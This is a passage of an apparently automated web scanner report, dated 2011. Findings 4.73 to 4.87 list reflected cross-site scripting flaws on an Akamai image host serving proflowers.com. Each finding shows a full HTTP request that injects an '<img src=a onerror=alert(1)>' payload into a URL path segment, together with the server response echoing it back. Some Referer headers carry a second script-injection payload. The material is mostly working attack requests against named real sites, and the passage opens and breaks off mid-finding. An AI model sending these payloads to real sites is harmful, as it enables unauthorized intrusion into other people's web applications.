Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/OCC_CKGSPAGRDN_RoseSpaV2_GEN_10_S10_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 7e221<img%20src%3da%20onerror%3dalert(1)>fb7298d04e was submitted in the REST URL parameter 9. This input was echoed as 7e221<img src=a onerror=alert(1)>fb7298d04e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/OCC_CKGSPAGRDN_RoseSpaV2_GEN_10_S10_SQ7e221<img%20src%3da%20onerror%3dalert(1)>fb7298d04e?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 113
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:13 GMT
Connection: close

Unable to find /ProvideCommerce/OCC_CKGSPAGRDN_RoseSpaV2_GEN_10_S10_SQ7e221<img src=a onerror=alert(1)>fb7298d04e

4.73. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/OCC_CKGSPAPROV_LavSpaV2_GEN_10_S10_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/OCC_CKGSPAPROV_LavSpaV2_GEN_10_S10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 2e51a<img%20src%3da%20onerror%3dalert(1)>f85c7e7ee4 was submitted in the REST URL parameter 9. This input was echoed as 2e51a<img src=a onerror=alert(1)>f85c7e7ee4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/OCC_CKGSPAPROV_LavSpaV2_GEN_10_S10_PF2e51a<img%20src%3da%20onerror%3dalert(1)>f85c7e7ee4?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 112
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:58 GMT
Connection: close

Unable to find /ProvideCommerce/OCC_CKGSPAPROV_LavSpaV2_GEN_10_S10_PF2e51a<img src=a onerror=alert(1)>f85c7e7ee4

4.74. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/OCC_CKGSPAPROV_LavSpaV2_GEN_10_S10_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/OCC_CKGSPAPROV_LavSpaV2_GEN_10_S10_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 3eff6<img%20src%3da%20onerror%3dalert(1)>448fbcc17a4 was submitted in the REST URL parameter 9. This input was echoed as 3eff6<img src=a onerror=alert(1)>448fbcc17a4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/OCC_CKGSPAPROV_LavSpaV2_GEN_10_S10_SQ3eff6<img%20src%3da%20onerror%3dalert(1)>448fbcc17a4?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 113
Cache-Control: no-store
Date: Mon, 09 May 2011 12:23:29 GMT
Connection: close

Unable to find /ProvideCommerce/OCC_CKGSPAPROV_LavSpaV2_GEN_10_S10_SQ3eff6<img src=a onerror=alert(1)>448fbcc17a4

4.75. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC3inbaby_tcuppnk09_Vday__ASPM_CNTRL_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC3inbaby_tcuppnk09_Vday__ASPM_CNTRL_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 54ec7<img%20src%3da%20onerror%3dalert(1)>fe758beee42 was submitted in the REST URL parameter 9. This input was echoed as 54ec7<img src=a onerror=alert(1)>fe758beee42 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC3inbaby_tcuppnk09_Vday__ASPM_CNTRL_PF54ec7<img%20src%3da%20onerror%3dalert(1)>fe758beee42?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 116
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:00 GMT
Connection: close

Unable to find /ProvideCommerce/ORC3inbaby_tcuppnk09_Vday__ASPM_CNTRL_PF54ec7<img src=a onerror=alert(1)>fe758beee42

4.76. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC6indblpurpphal_blktin09_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC6indblpurpphal_blktin09_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 87390<img%20src%3da%20onerror%3dalert(1)>6127ad3d4b was submitted in the REST URL parameter 9. This input was echoed as 87390<img src=a onerror=alert(1)>6127ad3d4b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC6indblpurpphal_blktin09_PF87390<img%20src%3da%20onerror%3dalert(1)>6127ad3d4b?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 104
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:03 GMT
Connection: close

Unable to find /ProvideCommerce/ORC6indblpurpphal_blktin09_PF87390<img src=a onerror=alert(1)>6127ad3d4b

4.77. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC6indblwhtphal_willow09_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC6indblwhtphal_willow09_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 27412<img%20src%3da%20onerror%3dalert(1)>83ab8e888d1 was submitted in the REST URL parameter 9. This input was echoed as 27412<img src=a onerror=alert(1)>83ab8e888d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC6indblwhtphal_willow09_PF27412<img%20src%3da%20onerror%3dalert(1)>83ab8e888d1?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 104
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:05 GMT
Connection: close

Unable to find /ProvideCommerce/ORC6indblwhtphal_willow09_PF27412<img src=a onerror=alert(1)>83ab8e888d1

4.78. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC6inphaltilandsia_curn09_l [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC6inphaltilandsia_curn09_l

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 136d7<img%20src%3da%20onerror%3dalert(1)>f39e388d55c was submitted in the REST URL parameter 9. This input was echoed as 136d7<img src=a onerror=alert(1)>f39e388d55c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC6inphaltilandsia_curn09_l136d7<img%20src%3da%20onerror%3dalert(1)>f39e388d55c?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 104
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:08 GMT
Connection: close

Unable to find /ProvideCommerce/ORC6inphaltilandsia_curn09_l136d7<img src=a onerror=alert(1)>f39e388d55c

4.79. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCbromgrdnblk07_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCbromgrdnblk07_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 3e66c<img%20src%3da%20onerror%3dalert(1)>e0bdb592a3a was submitted in the REST URL parameter 9. This input was echoed as 3e66c<img src=a onerror=alert(1)>e0bdb592a3a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCbromgrdnblk07_PF3e66c<img%20src%3da%20onerror%3dalert(1)>e0bdb592a3a?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=86&hei=100 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 95
Cache-Control: no-store
Date: Mon, 09 May 2011 12:09:28 GMT
Connection: close

Unable to find /ProvideCommerce/ORCbromgrdnblk07_PF3e66c<img src=a onerror=alert(1)>e0bdb592a3a

4.80. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCdblbromgardn09_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCdblbromgardn09_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload a3ae1<img%20src%3da%20onerror%3dalert(1)>81037f6294b was submitted in the REST URL parameter 9. This input was echoed as a3ae1<img src=a onerror=alert(1)>81037f6294b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCdblbromgardn09_PFa3ae1<img%20src%3da%20onerror%3dalert(1)>81037f6294b?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 96
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:01 GMT
Connection: close

Unable to find /ProvideCommerce/ORCdblbromgardn09_PFa3ae1<img src=a onerror=alert(1)>81037f6294b

4.81. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCdblkalblktin08_2_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCdblkalblktin08_2_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 2ac5a<img%20src%3da%20onerror%3dalert(1)>380fac3babc was submitted in the REST URL parameter 9. This input was echoed as 2ac5a<img src=a onerror=alert(1)>380fac3babc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCdblkalblktin08_2_PF2ac5a<img%20src%3da%20onerror%3dalert(1)>380fac3babc?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 98
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:05 GMT
Connection: close

Unable to find /ProvideCommerce/ORCdblkalblktin08_2_PF2ac5a<img src=a onerror=alert(1)>380fac3babc

4.82. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCdblorchidheart_silvervasepink11_PC1936_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCdblorchidheart_silvervasepink11_PC1936_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 56e55<img%20src%3da%20onerror%3dalert(1)>02759dc1b02 was submitted in the REST URL parameter 9. This input was echoed as 56e55<img src=a onerror=alert(1)>02759dc1b02 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCdblorchidheart_silvervasepink11_PC1936_PF56e55<img%20src%3da%20onerror%3dalert(1)>02759dc1b02?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 120
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:13 GMT
Connection: close

Unable to find /ProvideCommerce/ORCdblorchidheart_silvervasepink11_PC1936_PF56e55<img src=a onerror=alert(1)>02759dc1b02

4.83. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCwhtphalylwbrom07_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCwhtphalylwbrom07_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload f29c8<img%20src%3da%20onerror%3dalert(1)>5ffa66e876e was submitted in the REST URL parameter 9. This input was echoed as f29c8<img src=a onerror=alert(1)>5ffa66e876e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCwhtphalylwbrom07_PFf29c8<img%20src%3da%20onerror%3dalert(1)>5ffa66e876e?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 98
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:07 GMT
Connection: close

Unable to find /ProvideCommerce/ORCwhtphalylwbrom07_PFf29c8<img src=a onerror=alert(1)>5ffa66e876e

4.84. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0026339b [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0026339b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload d4bb1<img%20src%3da%20onerror%3dalert(1)>e7af5ef796 was submitted in the REST URL parameter 9. This input was echoed as d4bb1<img src=a onerror=alert(1)>e7af5ef796 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0026339bd4bb1<img%20src%3da%20onerror%3dalert(1)>e7af5ef796?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 84
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:31 GMT
Connection: close

Unable to find /ProvideCommerce/P0026339bd4bb1<img src=a onerror=alert(1)>e7af5ef796

4.85. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0049189b [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0049189b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload a8f1a<img%20src%3da%20onerror%3dalert(1)>e4b9939c645 was submitted in the REST URL parameter 9. This input was echoed as a8f1a<img src=a onerror=alert(1)>e4b9939c645 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0049189ba8f1a<img%20src%3da%20onerror%3dalert(1)>e4b9939c645?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:25 GMT
Connection: close

Unable to find /ProvideCommerce/P0049189ba8f1a<img src=a onerror=alert(1)>e4b9939c645

4.86. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0054324b [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0054324b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 953c7<img%20src%3da%20onerror%3dalert(1)>d73bd45dd2 was submitted in the REST URL parameter 9. This input was echoed as 953c7<img src=a onerror=alert(1)>d73bd45dd2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0054324b953c7<img%20src%3da%20onerror%3dalert(1)>d73bd45dd2?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 84
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:25 GMT
Connection: close

Unable to find /ProvideCommerce/P0054324b953c7<img src=a onerror=alert(1)>d73bd45dd2

4.87. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0055092b [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0055092b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload c4c9f<img%20src%3da%20onerror%3dalert(1)>f3daf93728a was submitted in the REST URL parameter 9. This input was echoed as c4c9f<img src=a onerror=alert(1)>f3daf93728a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0055092bc4c9f<img%20src%3da%20onerror%3dalert(1)>f3daf93728a?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

